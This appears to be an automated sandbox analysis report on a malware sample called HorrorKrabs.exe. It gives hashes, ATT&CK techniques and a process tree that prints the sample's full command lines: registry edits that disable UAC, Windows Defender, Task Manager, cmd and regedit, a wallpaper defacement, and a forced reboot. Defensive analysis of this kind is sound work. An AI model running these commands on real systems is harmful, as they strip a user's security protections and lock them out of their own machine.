216f31c18146824ec864ce1cd25980075831e6194e8fc8995554239a3070f62f

Resubmissions

28/03/2025, 01:00

250328-bcz46azxfs 10

28/03/2025, 00:55

250328-a9rzdaslz3 10

Analysis

max time kernel
7s
max time network
8s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
28/03/2025, 00:55

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

HorrorKrabs.exe
Size

31.1MB
MD5

a9ac58e28c018a526115108405f24c39
SHA1

a3e171ebb50717056d4f66507347e2fc4a812849
SHA256

d1229f89eccd5a1a3b19432deac06425c33564cf373564abbec0e5c8cfbd562e
SHA512

48e96bc307ab6beb2c84ca507a89b84cd5e146421e33ff7af9aa9086a96f806fe9b8d65dc9a5e54c18f1e9427c74255f943bea1868f39b66960741897302e0f2
SSDEEP

196608:/Bq8XWmsNIy3QT2bAx6gHux8fP1FdA29xTxVIVXAUPL7VsPBMHvUDJNkyhtTT0o5:NNsqEd9sf/llE/0NDkyhf5

Score

10^/10

defense_evasion discovery evasion ransomware trojan

Malware Config

Signatures

Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables RegEdit via registry modification 2 IoCs

defense_evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0"	HorrorKrabs.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
defense_evasion

Disables cmd.exe use via registry modification 2 IoCs

defense_evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "0"	HorrorKrabs.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop\Wallpaper = "c:\\windows\\update32\\bg.bmp"	reg.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\update32\bg.bmp	cmd.exe
File created	C:\Windows\update32\bg.bmp	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HorrorKrabs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shutdown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry key 1 TTPs 5 IoCs

Modify Registry

T1112

pid	Process
2288	reg.exe
3016	reg.exe
2836	reg.exe
2816	reg.exe
2968	reg.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2728	shutdown.exe
Token: SeRemoteShutdownPrivilege	2728	shutdown.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 2264 wrote to memory of 2356	2264	HorrorKrabs.exe	31
PID 2264 wrote to memory of 2356	2264	HorrorKrabs.exe	31
PID 2264 wrote to memory of 2356	2264	HorrorKrabs.exe	31
PID 2264 wrote to memory of 2356	2264	HorrorKrabs.exe	31
PID 2264 wrote to memory of 2356	2264	HorrorKrabs.exe	31
PID 2264 wrote to memory of 2356	2264	HorrorKrabs.exe	31
PID 2264 wrote to memory of 2356	2264	HorrorKrabs.exe	31
PID 2356 wrote to memory of 2912	2356	cmd.exe	33
PID 2356 wrote to memory of 2912	2356	cmd.exe	33
PID 2356 wrote to memory of 2912	2356	cmd.exe	33
PID 2356 wrote to memory of 2912	2356	cmd.exe	33
PID 2356 wrote to memory of 2924	2356	cmd.exe	34
PID 2356 wrote to memory of 2924	2356	cmd.exe	34
PID 2356 wrote to memory of 2924	2356	cmd.exe	34
PID 2356 wrote to memory of 2924	2356	cmd.exe	34
PID 2356 wrote to memory of 2924	2356	cmd.exe	34
PID 2356 wrote to memory of 2924	2356	cmd.exe	34
PID 2356 wrote to memory of 2924	2356	cmd.exe	34
PID 2356 wrote to memory of 2836	2356	cmd.exe	35
PID 2356 wrote to memory of 2836	2356	cmd.exe	35
PID 2356 wrote to memory of 2836	2356	cmd.exe	35
PID 2356 wrote to memory of 2836	2356	cmd.exe	35
PID 2356 wrote to memory of 2816	2356	cmd.exe	36
PID 2356 wrote to memory of 2816	2356	cmd.exe	36
PID 2356 wrote to memory of 2816	2356	cmd.exe	36
PID 2356 wrote to memory of 2816	2356	cmd.exe	36
PID 2356 wrote to memory of 2984	2356	cmd.exe	37
PID 2356 wrote to memory of 2984	2356	cmd.exe	37
PID 2356 wrote to memory of 2984	2356	cmd.exe	37
PID 2356 wrote to memory of 2984	2356	cmd.exe	37
PID 2356 wrote to memory of 2968	2356	cmd.exe	38
PID 2356 wrote to memory of 2968	2356	cmd.exe	38
PID 2356 wrote to memory of 2968	2356	cmd.exe	38
PID 2356 wrote to memory of 2968	2356	cmd.exe	38
PID 2356 wrote to memory of 2972	2356	cmd.exe	39
PID 2356 wrote to memory of 2972	2356	cmd.exe	39
PID 2356 wrote to memory of 2972	2356	cmd.exe	39
PID 2356 wrote to memory of 2972	2356	cmd.exe	39
PID 2972 wrote to memory of 2400	2972	net.exe	40
PID 2972 wrote to memory of 2400	2972	net.exe	40
PID 2972 wrote to memory of 2400	2972	net.exe	40
PID 2972 wrote to memory of 2400	2972	net.exe	40
PID 2356 wrote to memory of 2980	2356	cmd.exe	41
PID 2356 wrote to memory of 2980	2356	cmd.exe	41
PID 2356 wrote to memory of 2980	2356	cmd.exe	41
PID 2356 wrote to memory of 2980	2356	cmd.exe	41
PID 2356 wrote to memory of 2288	2356	cmd.exe	42
PID 2356 wrote to memory of 2288	2356	cmd.exe	42
PID 2356 wrote to memory of 2288	2356	cmd.exe	42
PID 2356 wrote to memory of 2288	2356	cmd.exe	42
PID 2356 wrote to memory of 3016	2356	cmd.exe	43
PID 2356 wrote to memory of 3016	2356	cmd.exe	43
PID 2356 wrote to memory of 3016	2356	cmd.exe	43
PID 2356 wrote to memory of 3016	2356	cmd.exe	43
PID 2356 wrote to memory of 2728	2356	cmd.exe	44
PID 2356 wrote to memory of 2728	2356	cmd.exe	44
PID 2356 wrote to memory of 2728	2356	cmd.exe	44
PID 2356 wrote to memory of 2728	2356	cmd.exe	44

System policy modification 1 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	HorrorKrabs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\HideFastUserSwitching = "1"	HorrorKrabs.exe

C:\Users\Admin\AppData\Local\Temp\HorrorKrabs.exe
"C:\Users\Admin\AppData\Local\Temp\HorrorKrabs.exe"
1⤵
- Disables RegEdit via registry modification
- Disables cmd.exe use via registry modification
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2264
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\krabsetup.bat" "
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2356
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\windows\update32\bg.bmp /f
    3⤵
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    PID:2912
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2924
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:2836
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:2816
- - C:\Windows\SysWOW64\reg.exe
    Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender DisableAntiSpyware settings
    - System Location Discovery: System Language Discovery
    PID:2984
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:2968
- - C:\Windows\SysWOW64\net.exe
    net user Admin /fullname:"MR KRABS WAS HERE!"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2972
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user Admin /fullname:"MR KRABS WAS HERE!"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2400
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2980
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f
    3⤵
    - Disables cmd.exe use via registry modification
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:2288
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
    3⤵
    - Disables RegEdit via registry modification
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:3016
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /r /t 00
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2728

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:1464

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\bg.bmp

Filesize
11.7MB

MD5
009b9f7e5b7b45674e6de11dfbc5873d

SHA1
fc848c11b0eb1c48b6e49e59bfb2df069ccf7756

SHA256
5b40b1922ac983f07ecc3e444813734aa03ce3270b7e5c0dc93610e34ed58de7

SHA512
cfe2087b0711a5d7ce486f338c49d5c6147b3c931f13b3ba27628200f26c3a9776de91a1cabd7bfd274a08fbe7b8a4f9ec172e4f7cfbf3234c8aa35399d03549

Download Submit
C:\Users\Admin\AppData\Local\Temp\krabsetup.bat

Filesize
1KB

MD5
7f5a110ccd8737cebf3f52b49424eecc

SHA1
67a0a8ef8745e20b1cc100a2ab95cde32ad7959a

SHA256
2ae0d42a78a32d4f8f81060cbe29b95eff8a90031690d2b7cc70d540a6110d03

SHA512
68d4d79c3007b50dcbd783f6e3020b8e640613c79943c8cf82456dcb7892baf0466b4f2dba4a3b9da6240cb305acdb3c9000f7b80bf63649ade767d8963476c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\krabslol.exe

Filesize
19.3MB

MD5
e1a919b2c68ec9e615b390adb8064bf0

SHA1
a0cab57b6bdbe2dcb888ea07fe4ed161916f6398

SHA256
6166b3e0ec7478ac54b33edaf001fb2421f15a559bcc0f37f09c08a4e466fda8

SHA512
3e837cd486806d63516488b2ac0a514e2e03bf3d7c511a7aa6c532c0569580cfbe81311d57b4a3621ee151806994e0935cf2528fadfe275a8a9a3242610a4279

Download Submit
memory/2264-0-0x00000000746FE000-0x00000000746FF000-memory.dmp

Filesize
4KB

Download
memory/2264-1-0x00000000012F0000-0x0000000003218000-memory.dmp

Filesize
31.2MB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads